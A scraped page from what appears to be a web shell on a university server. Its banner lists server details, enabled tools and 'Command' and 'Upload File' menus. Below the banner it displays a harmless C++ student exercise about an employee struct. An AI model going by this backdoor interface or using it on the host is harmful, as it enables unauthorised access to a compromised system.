Server IP : 172.16.15.8 / Your IP : 18.117.172.189 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0705) : /home/owpile/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
// // Goal: create data type employee // #include<iostream> using namespace std; struct employee { int id; string name; int sal; int years; }; int main() { employee Orlando; employee Evan; //Q: use assignment to get values for you; // use kb I/O for the other Orlando.id = 123456789; Orlando.name = "Orlando Pile"; Orlando.sal = 250000; Orlando.years = 2; cout << "Input Evan's information from kb - \n"; cin >> Evan.id; cin.ignore(10, '\n'); //p.26 getline(cin, Evan.name); cin >> Evan.sal; cin >> Evan.years; cout << "your info: " << Orlando.id << ", " << Orlando.name << ", " << Orlando.sal <<", " << Orlando.years << "\n\n"; cout << "Evan's info: " << Evan.id << ", " << Evan.name << ", " << Evan.sal <<", " << Evan.years << "\n\n"; //Q. out total sal of you two cout << Orlando.sal+Evan.sal << endl; cout << "Done. \n\n"; return 0; }